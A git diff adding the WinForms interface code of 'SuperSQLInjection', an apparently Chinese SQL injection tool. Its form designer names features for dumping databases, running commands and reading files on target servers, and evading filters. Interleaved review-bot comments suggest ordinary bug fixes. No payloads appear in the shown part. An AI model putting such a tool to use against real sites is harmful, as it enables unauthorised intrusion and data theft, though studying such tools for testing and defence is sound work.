diff --git a/SuperSQLInjection.sln b/SuperSQLInjection.sln new file mode 100644 index 0000000..5278121 --- /dev/null +++ b/SuperSQLInjection.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 11.00 +# Visual Studio 2010 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SuperSQLInjection", "SuperSQLInjection\SuperSQLInjection.csproj", "{6C2AE3DB-3349-4A1F-9287-9278629CD0D6}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x86 = Debug|x86 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.ActiveCfg = Debug|x86 + {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.Build.0 = Debug|x86 + {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.ActiveCfg = Release|x86 + {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.Build.0 = Release|x86 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/SuperSQLInjection/ADDNOD~1.RES b/SuperSQLInjection/ADDNOD~1.RES new file mode 100644 index 0000000..7080a7d --- /dev/null +++ b/SuperSQLInjection/ADDNOD~1.RES @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/About.Designer.cs b/SuperSQLInjection/About.Designer.cs new file mode 100644 index 0000000..65af73d --- /dev/null +++ b/SuperSQLInjection/About.Designer.cs 
@@ -0,0 +1,65 @@ +namespace SuperSQLInjection +{ + partial class About + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(About)); + this.richTextBox1 = new System.Windows.Forms.RichTextBox(); + this.SuspendLayout(); + // + // richTextBox1 + // + this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill; + this.richTextBox1.Location = new System.Drawing.Point(0, 0); + this.richTextBox1.Name = "richTextBox1"; + this.richTextBox1.Size = new System.Drawing.Size(595, 304); + this.richTextBox1.TabIndex = 2; + this.richTextBox1.Text = resources.GetString("richTextBox1.Text"); + // + // About + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(595, 304); + this.Controls.Add(this.richTextBox1); + this.Name = "About"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; + this.Text = "关 于"; + this.ResumeLayout(false); + + } + + #endregion + + private System.Windows.Forms.RichTextBox richTextBox1; + + + + + } +} \ No newline at end of file diff --git a/SuperSQLInjection/About.cs b/SuperSQLInjection/About.cs new file mode 100644 index 0000000..297427a --- /dev/null +++ b/SuperSQLInjection/About.cs 
@@ -0,0 +1,18 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class About : Form
+ {
+ public About()
+ {
+ InitializeComponent();
+ }
+ }
+}
diff --git a/SuperSQLInjection/AddNode.Designer.cs b/SuperSQLInjection/AddNode.Designer.cs
new file mode 100644
index 0000000..73665af
--- /dev/null
+++ b/SuperSQLInjection/AddNode.Designer.cs
@@ -0,0 +1,72 @@ +namespace SuperSQLInjection +{ + partial class AddNode + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + this.btn_addNode = new System.Windows.Forms.Button(); + this.txt_node_text = new System.Windows.Forms.TextBox(); + this.SuspendLayout(); + // + // btn_addNode + // + this.btn_addNode.Location = new System.Drawing.Point(192, 21); + this.btn_addNode.Name = "btn_addNode"; + this.btn_addNode.Size = new System.Drawing.Size(56, 23); + this.btn_addNode.TabIndex = 0; + this.btn_addNode.Text = "添 加"; + this.btn_addNode.UseVisualStyleBackColor = true; + this.btn_addNode.Click += new System.EventHandler(this.btn_addNode_Click); + // + // txt_node_text + // + this.txt_node_text.Location = new System.Drawing.Point(21, 21); + this.txt_node_text.Name = "txt_node_text"; + this.txt_node_text.Size = new System.Drawing.Size(152, 21); + this.txt_node_text.TabIndex = 1; + // + // AddNode + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(266, 64); + this.Controls.Add(this.txt_node_text); + this.Controls.Add(this.btn_addNode); + this.Name = "AddNode"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; + this.Text = "AddNode"; + this.ResumeLayout(false); + this.PerformLayout(); + + } + + #endregion + + private System.Windows.Forms.Button btn_addNode; + private 
System.Windows.Forms.TextBox txt_node_text;
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/AddNode.cs b/SuperSQLInjection/AddNode.cs
new file mode 100644
index 0000000..c537476
--- /dev/null
+++ b/SuperSQLInjection/AddNode.cs
@@ -0,0 +1,75 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+using tools;
+
+namespace SuperSQLInjection
+{
+ public partial class AddNode : Form
+ {
+ public AddNode()
+ {
+ InitializeComponent();
+ }
+
+ public TreeNode tn = null;
+ public TreeView tvw = null;
+ public int type = 0;
+
+ private void btn_addNode_Click(object sender, EventArgs e)
+ {
+ if (this.txt_node_text.TextLength <= 0)
+ {
+ MessageBox.Show("请输入节点的值!");
+ return;
+ }
+ TreeNode ctn = new TreeNode(this.txt_node_text.Text);
+ if (type == 1)
+ {
+ ctn.Tag = "dbs";
+
+ if (Tools.isExistsNode(tvw.Nodes,this.txt_node_text.Text))
+ {
+ MessageBox.Show("已存在相同的节点!");
+ }
+ else {
+ tvw.Nodes.Add(ctn);
+ }
+ }
+
+ else {
+
+ if (tn != null)
+ {
+ if ("dbs".Equals(tn.Tag))
+ {
+ ctn.Tag = "table";
+ }
+ else if ("table".Equals(tn.Tag))
+ {
+ ctn.Tag = "column";
+ }
+ if (Tools.isExistsNode(tn.Nodes, this.txt_node_text.Text))
+ {
+ MessageBox.Show("已存在相同的节点!");
+ }
+ else
+ {
+ tn.Nodes.Add(ctn);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("请选择添加表或列对应的数据库或表!");
+ }
+ }
+
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/AddNode.resx b/SuperSQLInjection/AddNode.resx
new file mode 100644
index 0000000..7080a7d
--- /dev/null
+++ b/SuperSQLInjection/AddNode.resx
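Review bot: In `btn_addNode_Click` the `type == 1` branch dereferences `tvw.Nodes` without a null check, although the public field defaults to null and the other branch does guard `tn`; a caller that sets `type` but not `tvw` gets a NullReferenceException instead of a message, so a guard such as `if (tvw == null) return;` belongs before the lookup. In the `else` branch, a parent whose Tag is neither "dbs" nor "table" falls through both `if`s and the new node is added with no Tag at all; if that case is not meant to be supported, return before `tn.Nodes.Add(ctn)`. The `TextLength <= 0` test also lets a whitespace-only name through; `this.txt_node_text.Text.Trim().Length == 0` would reject it. The three public mutable fields (`tn`, `tvw`, `type`) deserve a short comment stating which of them the caller must set for each value of `type`.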
@@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/FindString.Designer.cs b/SuperSQLInjection/FindString.Designer.cs new file mode 100644 index 0000000..2533825 --- /dev/null +++ b/SuperSQLInjection/FindString.Designer.cs 
@@ -0,0 +1,109 @@ +namespace SuperSQLInjection +{ + partial class FindString + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + this.label1 = new System.Windows.Forms.Label(); + this.find_txt = new System.Windows.Forms.TextBox(); + this.button1 = new System.Windows.Forms.Button(); + this.label2 = new System.Windows.Forms.Label(); + this.lbl_count = new System.Windows.Forms.Label(); + this.SuspendLayout(); + // + // label1 + // + this.label1.AutoSize = true; + this.label1.Location = new System.Drawing.Point(12, 21); + this.label1.Name = "label1"; + this.label1.Size = new System.Drawing.Size(53, 12); + this.label1.TabIndex = 0; + this.label1.Text = "关键字:"; + // + // find_txt + // + this.find_txt.Location = new System.Drawing.Point(71, 18); + this.find_txt.Name = "find_txt"; + this.find_txt.Size = new System.Drawing.Size(164, 21); + this.find_txt.TabIndex = 1; + this.find_txt.TextChanged += new System.EventHandler(this.find_txt_TextChanged); + // + // button1 + // + this.button1.Location = new System.Drawing.Point(341, 17); + this.button1.Name = "button1"; + this.button1.Size = new System.Drawing.Size(75, 23); + this.button1.TabIndex = 2; + this.button1.Text = "查找下一个"; + this.button1.UseVisualStyleBackColor = true; + this.button1.Click += new System.EventHandler(this.button1_Click); + // + // label2 + // + this.label2.AutoSize = true; + this.label2.Location = new System.Drawing.Point(241, 22); + this.label2.Name = 
"label2"; + this.label2.Size = new System.Drawing.Size(53, 12); + this.label2.TabIndex = 3; + this.label2.Text = "匹配数:"; + // + // lbl_count + // + this.lbl_count.AutoSize = true; + this.lbl_count.Location = new System.Drawing.Point(300, 22); + this.lbl_count.Name = "lbl_count"; + this.lbl_count.Size = new System.Drawing.Size(11, 12); + this.lbl_count.TabIndex = 3; + this.lbl_count.Text = "0"; + // + // FindString + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(429, 57); + this.Controls.Add(this.lbl_count); + this.Controls.Add(this.label2); + this.Controls.Add(this.button1); + this.Controls.Add(this.find_txt); + this.Controls.Add(this.label1); + this.Name = "FindString"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; + this.Text = "查找"; + this.ResumeLayout(false); + this.PerformLayout(); + + } + + #endregion + + private System.Windows.Forms.Label label1; + private System.Windows.Forms.TextBox find_txt; + private System.Windows.Forms.Button button1; + private System.Windows.Forms.Label label2; + private System.Windows.Forms.Label lbl_count; + } +} \ No newline at end of file diff --git a/SuperSQLInjection/FindString.cs b/SuperSQLInjection/FindString.cs new file mode 100644 index 0000000..e2d7ed7 --- /dev/null +++ b/SuperSQLInjection/FindString.cs 
@@ -0,0 +1,68 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class FindString : Form
+ {
+
+ public FindString()
+ {
+ InitializeComponent();
+ }
+ public int searchPoint = 0;
+ public TextBox txtbox = null;
+ private void button1_Click(object sender, EventArgs e)
+ {
+ //查找下一个
+
+ if (txtbox.Text == "")
+ {
+ //没内容
+ MessageBox.Show("查找内容为空,请输入查找内容", "", MessageBoxButtons.OK, MessageBoxIcon.Error);
+ }
+ else
+ {
+ //有查找内容时
+ searchPoint = txtbox.Text.IndexOf(this.find_txt.Text, searchPoint);//用IndexOf索引
+ if (searchPoint <0)
+ {
+ //没找到
+ MessageBox.Show("已到文本末尾,没有找到", "提示", MessageBoxButtons.OK, MessageBoxIcon.Information);
+ searchPoint = 0;
+ }
+ else
+ {
+ //找到了,选中文本
+ txtbox.Select(searchPoint, this.find_txt.Text.Length);
+ searchPoint = searchPoint + this.find_txt.Text.Length;
+ txtbox.Focus();
+ }
+ }
+ }
+
+ private void find_txt_TextChanged(object sender, EventArgs e)
+ {
+
+ int count = 0; //计数器
+ string search = this.find_txt.Text; //要查的字符串
+ if("".Equals(search)){
+ return;
+ }
+
+ for (int i = 0; i <= txtbox.Text.Length - search.Length; i++)
+ {
+ if (txtbox.Text.Substring(i, search.Length).ToLower() == search.ToLower())
+ {
+ count++;
+ }
+ }
+ this.lbl_count.Text = count.ToString();
+ }
+ }
+}
diff --git a/SuperSQLInjection/FindString.resx b/SuperSQLInjection/FindString.resx
new file mode 100644
index 0000000..7080a7d
--- /dev/null
+++ b/SuperSQLInjection/FindString.resx
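Review bot: `button1_Click` checks `txtbox.Text == ""` but never checks the keyword, so an empty `this.find_txt.Text` reaches `IndexOf`, which returns `searchPoint` itself and selects a zero-length range on every click; the guard should cover both, `if (txtbox.Text == "" || this.find_txt.Text == "")`. `searchPoint` survives between clicks, so if the target text has become shorter in the meantime `IndexOf(..., searchPoint)` throws ArgumentOutOfRangeException; adding `if (searchPoint > txtbox.Text.Length) searchPoint = 0;` before the call avoids that. The counter in `find_txt_TextChanged` compares with `ToLower()` while the search itself is case-sensitive, so the displayed match count can disagree with what "find next" actually locates; using `StringComparison.OrdinalIgnoreCase` in both places would make them consistent. `txtbox` is a public field that defaults to null and is dereferenced in both handlers without a check.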
@@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/Main.Designer.cs b/SuperSQLInjection/Main.Designer.cs new file mode 100644 index 0000000..0bf1ced --- /dev/null +++ b/SuperSQLInjection/Main.Designer.cs 
@@ -0,0 +1,3176 @@ +namespace SuperSQLInjection +{ + partial class Main + { + /// + /// 必需的设计器变量。 + /// + private System.ComponentModel.IContainer components = null; + + /// + /// 清理所有正在使用的资源。 + /// + /// 如果应释放托管资源,为 true;否则为 false。 + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows 窗体设计器生成的代码 + + /// + /// 设计器支持所需的方法 - 不要 + /// 使用代码编辑器修改此方法的内容。 + /// + private void InitializeComponent() + { + this.components = new System.ComponentModel.Container(); + System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Main)); + this.gb_basic = new System.Windows.Forms.GroupBox(); + this.chk_useSSL = new System.Windows.Forms.CheckBox(); + this.btn_exportConfig = new System.Windows.Forms.Button(); + this.cbox_basic_threadSize = new System.Windows.Forms.ComboBox(); + this.cbox_basic_reTryCount = new System.Windows.Forms.ComboBox(); + this.cbox_basic_encoding = new System.Windows.Forms.ComboBox(); + this.cbox_basic_timeOut = new System.Windows.Forms.ComboBox(); + this.label9 = new System.Windows.Forms.Label(); + this.label11 = new System.Windows.Forms.Label(); + this.label5 = new System.Windows.Forms.Label(); + this.btn_autoInject = new System.Windows.Forms.Button(); + this.cbox_basic_dbType = new System.Windows.Forms.ComboBox(); + this.label6 = new System.Windows.Forms.Label(); + this.cbox_basic_injectType = new System.Windows.Forms.ComboBox(); + this.txt_basic_port = new System.Windows.Forms.TextBox(); + this.label2 = new System.Windows.Forms.Label(); + this.txt_basic_host = new System.Windows.Forms.TextBox(); + this.label3 = new System.Windows.Forms.Label(); + this.label7 = new System.Windows.Forms.Label(); + this.label1 = new System.Windows.Forms.Label(); + this.menuStrip_main = new System.Windows.Forms.MenuStrip(); + this.tsmi_menu = new System.Windows.Forms.ToolStripMenuItem(); + 
this.tsmi_openConfig = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_saveConfig = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_tools = new System.Windows.Forms.ToolStripMenuItem(); + this.脱裤助手ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_seting = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_help = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_readme = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_about = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_update = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_mustRead = new System.Windows.Forms.ToolStripMenuItem(); + this.版本ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_bugReport = new System.Windows.Forms.ToolStripMenuItem(); + this.gb_logo = new System.Windows.Forms.GroupBox(); + this.txt_log = new System.Windows.Forms.TextBox(); + this.tab_logCenter = new System.Windows.Forms.TabPage(); + this.splitContainer1 = new System.Windows.Forms.SplitContainer(); + this.groupBox5 = new System.Windows.Forms.GroupBox(); + this.log_lvw_httpLog = new System.Windows.Forms.ListView(); + this.log_col_index = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.log_col_payload = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.col_runtime = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.log_col_code = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.log_col_bodyLength = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.log_col_sleepTime = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.log_cms_dataifo = new System.Windows.Forms.ContextMenuStrip(this.components); + this.data_cms_clearLog = new 
System.Windows.Forms.ToolStripMenuItem(); + this.groupBox6 = new System.Windows.Forms.GroupBox(); + this.tabControl2 = new System.Windows.Forms.TabControl(); + this.tabPage3 = new System.Windows.Forms.TabPage(); + this.log_txt_request = new System.Windows.Forms.TextBox(); + this.tabPage4 = new System.Windows.Forms.TabPage(); + this.log_txt_response = new System.Windows.Forms.TextBox(); + this.tabPage1 = new System.Windows.Forms.TabPage(); + this.webBro_log = new System.Windows.Forms.WebBrowser(); + this.tab_file = new System.Windows.Forms.TabPage(); + this.file_txt_result = new System.Windows.Forms.TextBox(); + this.groupBox7 = new System.Windows.Forms.GroupBox(); + this.file_btn_start = new System.Windows.Forms.Button(); + this.file_cbox_readWrite = new System.Windows.Forms.ComboBox(); + this.file_txt_filePath = new System.Windows.Forms.TextBox(); + this.label14 = new System.Windows.Forms.Label(); + this.cbox_file_readFileEncoding = new System.Windows.Forms.ComboBox(); + this.label24 = new System.Windows.Forms.Label(); + this.tab_dataCenter = new System.Windows.Forms.TabPage(); + this.tabC_dataCenter = new System.Windows.Forms.TabControl(); + this.tab_vers = new System.Windows.Forms.TabPage(); + this.data_lvw_ver = new System.Windows.Forms.ListView(); + this.data_lvw_ver_verName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.data_lvw_ver_verValue = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.data_cms_vers = new System.Windows.Forms.ContextMenuStrip(this.components); + this.data_cms_tsmi_getVariable = new System.Windows.Forms.ToolStripMenuItem(); + this.data_cms_tsmi_stopGetVariable = new System.Windows.Forms.ToolStripMenuItem(); + this.data_cms_tsmi_copyVerValue = new System.Windows.Forms.ToolStripMenuItem(); + this.tab_dbs = new System.Windows.Forms.TabPage(); + this.spc_dbs = new System.Windows.Forms.SplitContainer(); + this.data_dbs_ts = new System.Windows.Forms.ToolStrip(); + 
this.data_dbs_tsl_getDBS = new System.Windows.Forms.ToolStripButton(); + this.data_dbs_tsl_getTables = new System.Windows.Forms.ToolStripButton(); + this.data_dbs_tsl_getColumns = new System.Windows.Forms.ToolStripButton(); + this.groupBox2 = new System.Windows.Forms.GroupBox(); + this.data_tvw_dbs = new System.Windows.Forms.TreeView(); + this.data_cms_dbs = new System.Windows.Forms.ContextMenuStrip(this.components); + this.data_dbs_tsmi_addDBS = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_tsmi_addTableOrColumn = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_tsmi_getTableNames = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_tsmi_deleteNode = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_tsmi_stopGetInfos = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_tsmi_saveDTCStruct = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_tsmi_loadDTCStruct = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_tsmi_clearDTCStruct = new System.Windows.Forms.ToolStripMenuItem(); + this.imglist_database = new System.Windows.Forms.ImageList(this.components); + this.toolStrip1 = new System.Windows.Forms.ToolStrip(); + this.toolStripLabel3 = new System.Windows.Forms.ToolStripLabel(); + this.data_dbs_txt_start = new System.Windows.Forms.ToolStripTextBox(); + this.toolStripLabel1 = new System.Windows.Forms.ToolStripLabel(); + this.data_dbs_txt_count = new System.Windows.Forms.ToolStripTextBox(); + this.data_dbs_tsl_getDatas = new System.Windows.Forms.ToolStripButton(); + this.data_dbs_tsl_exportDatas = new System.Windows.Forms.ToolStripButton(); + this.toolStripLabel2 = new System.Windows.Forms.ToolStripLabel(); + this.data_dbs_cob_db_encoding = new System.Windows.Forms.ToolStripComboBox(); + this.groupBox4 = new System.Windows.Forms.GroupBox(); + this.data_dbs_lvw_data = new System.Windows.Forms.ListView(); + this.cms_data_dbs_lvw_data = new 
System.Windows.Forms.ContextMenuStrip(this.components); + this.data_dbs_lvw_tsmi_copyLineData = new System.Windows.Forms.ToolStripMenuItem(); + this.data_dbs_lvw_tsmi_stop = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_clearColumns = new System.Windows.Forms.ToolStripMenuItem(); + this.myicon_list = new System.Windows.Forms.ImageList(this.components); + this.tab_injectCenter = new System.Windows.Forms.TabPage(); + this.groupBox1 = new System.Windows.Forms.GroupBox(); + this.txt_inject_request = new System.Windows.Forms.TextBox(); + this.cms_dataPacks = new System.Windows.Forms.ContextMenuStrip(this.components); + this.tsmi_createGetTemplate = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_createPOSTTemplate = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_changeRequestMethod = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_createPackByURL = new System.Windows.Forms.ToolStripMenuItem(); + this.groupBox3 = new System.Windows.Forms.GroupBox(); + this.groupBox16 = new System.Windows.Forms.GroupBox(); + this.label4 = new System.Windows.Forms.Label(); + this.txt_inject_showColumn = new System.Windows.Forms.TextBox(); + this.label8 = new System.Windows.Forms.Label(); + this.txt_inject_unionColumnsCount = new System.Windows.Forms.TextBox(); + this.groupBox15 = new System.Windows.Forms.GroupBox(); + this.cbox_inject_type = new System.Windows.Forms.ComboBox(); + this.label27 = new System.Windows.Forms.Label(); + this.inject_btn_autoFindKey = new System.Windows.Forms.Button(); + this.injectConfig_btn_checkKey = new System.Windows.Forms.Button(); + this.txt_inject_key = new System.Windows.Forms.TextBox(); + this.chk_inject_reverseKey = new System.Windows.Forms.CheckBox(); + this.chk_openURLEncoding = new System.Windows.Forms.CheckBox(); + this.btn_inject_setEncodingRange = new System.Windows.Forms.Button(); + this.label13 = new System.Windows.Forms.Label(); + this.label12 = new System.Windows.Forms.Label(); + 
this.btn_inject_clearRequest = new System.Windows.Forms.Button(); + this.btn_inject_sendData = new System.Windows.Forms.Button(); + this.chk_inject_foward_302 = new System.Windows.Forms.CheckBox(); + this.btn_inject_setInject = new System.Windows.Forms.Button(); + this.mytab = new System.Windows.Forms.TabControl(); + this.tab_cmd = new System.Windows.Forms.TabPage(); + this.cmd_txt_result = new System.Windows.Forms.TextBox(); + this.groupBox8 = new System.Windows.Forms.GroupBox(); + this.cmd_chk_showCmdResult = new System.Windows.Forms.CheckBox(); + this.cmd_btn_start = new System.Windows.Forms.Button(); + this.cmd_txt_cmd = new System.Windows.Forms.TextBox(); + this.label15 = new System.Windows.Forms.Label(); + this.tab_bypass = new System.Windows.Forms.TabPage(); + this.groupBox9 = new System.Windows.Forms.GroupBox(); + this.cbox_base64Count = new System.Windows.Forms.ComboBox(); + this.bypass_btn_saveTemplate = new System.Windows.Forms.Button(); + this.bypass_cbox_loadTemplate = new System.Windows.Forms.ComboBox(); + this.label28 = new System.Windows.Forms.Label(); + this.chk_reaplaceBeforURLEncode = new System.Windows.Forms.CheckBox(); + this.cob_keyRepalce = new System.Windows.Forms.ComboBox(); + this.label10 = new System.Windows.Forms.Label(); + this.bypass_chk_base64 = new System.Windows.Forms.CheckBox(); + this.bypass_cbox_randIPToHeader = new System.Windows.Forms.ComboBox(); + this.label18 = new System.Windows.Forms.Label(); + this.label17 = new System.Windows.Forms.Label(); + this.bypass_cbox_sendHTTPSleepTime = new System.Windows.Forms.ComboBox(); + this.bypass_chk_inculdeStr = new System.Windows.Forms.CheckBox(); + this.label16 = new System.Windows.Forms.Label(); + this.bypass_txt_replaceTo = new System.Windows.Forms.TextBox(); + this.bypass_txt_replace = new System.Windows.Forms.TextBox(); + this.bypass_lvw_replaceString = new System.Windows.Forms.ListView(); + this.col_replace = ((System.Windows.Forms.ColumnHeader)(new 
System.Windows.Forms.ColumnHeader())); + this.col_replaceTo = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.bypass_lvw_replaceString_cms = new System.Windows.Forms.ContextMenuStrip(this.components); + this.bypass_delselect = new System.Windows.Forms.ToolStripMenuItem(); + this.bypass_btn_addReplaceStr = new System.Windows.Forms.Button(); + this.label19 = new System.Windows.Forms.Label(); + this.tab_encoding = new System.Windows.Forms.TabPage(); + this.groupBox13 = new System.Windows.Forms.GroupBox(); + this.label21 = new System.Windows.Forms.Label(); + this.label23 = new System.Windows.Forms.Label(); + this.encode_cbox_encode = new System.Windows.Forms.ComboBox(); + this.encode_cbox_decode = new System.Windows.Forms.ComboBox(); + this.groupBox11 = new System.Windows.Forms.GroupBox(); + this.encode_txt_result = new System.Windows.Forms.TextBox(); + this.groupBox10 = new System.Windows.Forms.GroupBox(); + this.encode_txt_input = new System.Windows.Forms.TextBox(); + this.tab_scanInjection = new System.Windows.Forms.TabPage(); + this.groupBox14 = new System.Windows.Forms.GroupBox(); + this.splitContainer2 = new System.Windows.Forms.SplitContainer(); + this.scanInject_lsb_links = new System.Windows.Forms.ListBox(); + this.scanInjectionURL_cms = new System.Windows.Forms.ContextMenuStrip(this.components); + this.tsmi_exportScanInjectionURL = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_clearScanInjectionURL = new System.Windows.Forms.ToolStripMenuItem(); + this.scanInjection_lvw_result = new System.Windows.Forms.ListView(); + this.col_index = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.col_url = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.col_testURL = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.col_param = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + 
this.col_injectionType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.col_injectionDB = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.col_mark = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.scanInjection_cms = new System.Windows.Forms.ContextMenuStrip(this.components); + this.scanInjection_cms_exportResult = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_tsmi_exortTestURL = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_tsmi_exortOldURL = new System.Windows.Forms.ToolStripMenuItem(); + this.scanInjection_cms_copyURL = new System.Windows.Forms.ToolStripMenuItem(); + this.scanInjection_cms_clearResult = new System.Windows.Forms.ToolStripMenuItem(); + this.scanInjection_cms_delThisLine = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_openURL = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_tsmi_opentestURL = new System.Windows.Forms.ToolStripMenuItem(); + this.groupBox12 = new System.Windows.Forms.GroupBox(); + this.scanInect_chk_isSpider = new System.Windows.Forms.CheckBox(); + this.scanInect_chk_scanError = new System.Windows.Forms.CheckBox(); + this.scanInjection_btn_spider = new System.Windows.Forms.Button(); + this.scanInjection_btn_scan = new 